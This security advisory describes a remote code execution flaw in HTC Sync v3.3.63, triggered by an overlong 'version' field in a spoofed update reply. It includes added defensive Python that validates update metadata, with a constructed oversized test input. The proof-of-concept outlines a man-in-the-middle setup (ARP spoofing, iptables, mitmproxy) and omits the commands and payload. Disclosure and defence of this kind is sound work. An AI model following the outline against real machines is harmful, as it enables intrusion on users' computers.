SSD Advisory – HTC Sync Remote Code Execution

Credit to Author: Maor Schwartz | Date: Mon, 27 Feb 2017 10:19:14 +0000

Vulnerabilities Summary
The following advisory describes a remote code execution (RCE) found in HTC Sync version v3.3.63.

Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response
The vulnerability was not reported to the vendor because the product reached end of life on 31 August 2016 and was replaced by HTC Sync Manager, which is not affected by this vulnerability.

Vulnerability Details

HTC Sync contains a remotely exploitable vulnerability in the latest HTC Sync (v3.3.63) software. During startup, or when explicitly triggered by the user, HTC Sync checks for the latest version by sending an HTTP request to htc.com and then parses the reply (XML format).

In particular, the application first requests:

Which contains a link to the download URI which is available in:

By modifying e.g. the “version” field in the XML document, an attacker can inject arbitrary code that gets executed on the victim's machine.
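The root cause described above is that metadata from an unauthenticated, plain-HTTP update check is trusted without bounds checking. The following is an added example, not HTC's code and not part of the advisory, showing how a client should validate such a reply before using any field: every element gets a hard length ceiling, the version must match a strict dotted-numeric pattern, and the download link must be HTTPS to an expected host. The XML layout, the element names `version` and `download_uri`, the host allowlist and the sample responses are all assumptions constructed for this example, not HTC's real schema.

```python
"""Added example (not HTC's code): validate update-check metadata before use.

The XML layout, the element names <version> and <download_uri>, and the
host allowlist are assumptions made for this example, not HTC's real schema.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Hard upper bounds on every field copied out of the response. A legitimate
# version string is a few dozen bytes; anything larger is rejected outright
# instead of being handed to a fixed-size buffer or string routine.
MAX_VERSION_LEN = 32
MAX_URI_LEN = 2048
VERSION_RE = re.compile(r"^\d{1,4}(?:\.\d{1,4}){1,3}$")
ALLOWED_HOSTS = {"www.htc.com", "htc.com"}  # assumed allowlist for the example


class UpdateMetadataError(ValueError):
    """Raised when the update response fails validation."""


def _bounded_text(root: ET.Element, tag: str, limit: int) -> str:
    """Return the text of <tag>, enforcing presence and a length ceiling."""
    text = root.findtext(tag)
    if text is None:
        raise UpdateMetadataError(f"missing <{tag}>")
    if len(text) > limit:
        raise UpdateMetadataError(f"<{tag}> is {len(text)} chars, limit {limit}")
    return text.strip()


def parse_update_response(xml_bytes: bytes) -> dict:
    """Parse an update-check reply, rejecting anything outside the expected shape."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        raise UpdateMetadataError(f"malformed XML: {exc}") from exc

    version = _bounded_text(root, "version", MAX_VERSION_LEN)
    if not VERSION_RE.fullmatch(version):
        raise UpdateMetadataError(f"version {version!r} is not dotted-numeric")

    uri = _bounded_text(root, "download_uri", MAX_URI_LEN)
    parsed = urlparse(uri)
    # The download must come over TLS from an expected host; a plain-HTTP
    # link is exactly what a man-in-the-middle can rewrite.
    if parsed.scheme != "https" or parsed.hostname not in ALLOWED_HOSTS:
        raise UpdateMetadataError(f"download URI rejected: {uri!r}")

    return {"version": version, "download_uri": uri}


def is_acceptable(xml_bytes: bytes) -> bool:
    """Boolean wrapper: True only if the response passes every check."""
    try:
        parse_update_response(xml_bytes)
        return True
    except UpdateMetadataError:
        return False


# Constructed sample responses (not captured from the real service).
GOOD_RESPONSE = b"""<update>
  <version>3.3.63</version>
  <download_uri>https://www.htc.com/example/HTCSync.exe</download_uri>
</update>"""

# An oversized <version> value of the kind the advisory describes as the trigger.
OVERSIZED_RESPONSE = (
    b"<update><version>" + b"A" * 4096 + b"</version>"
    b"<download_uri>https://www.htc.com/example/HTCSync.exe</download_uri></update>"
)

# A well-formed version but a download link downgraded to plain HTTP.
PLAIN_HTTP_RESPONSE = b"""<update>
  <version>3.3.63</version>
  <download_uri>http://www.htc.com/example/HTCSync.exe</download_uri>
</update>"""

if __name__ == "__main__":
    for name, body in [("good", GOOD_RESPONSE), ("oversized", OVERSIZED_RESPONSE),
                       ("plain-http", PLAIN_HTTP_RESPONSE)]:
        print(f"{name}: accepted={is_acceptable(body)}")
```

Length and format checks only close the specific hole the advisory describes; the durable fix for an update channel is fetching the metadata over TLS and verifying a signature on both the metadata and the downloaded installer, so that a network-position attacker cannot substitute either.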

Proof of Concept

An attacker who can position themselves as a man-in-the-middle, either through ARP spoofing or DNS poisoning, can intercept the traffic and supply an overly long XML parameter, which leads to remote code execution on the victim's machine.

We used Kali Linux to set up the man-in-the-middle attack:

  1. Enable ARP spoofing
  2. Enable IP forwarding
  3. Add an iptables rule for mitmproxy:
  4. Start mitmproxy
  5. Intercept and modify traffic by hand

The “version” string for popping up calc.exe is:
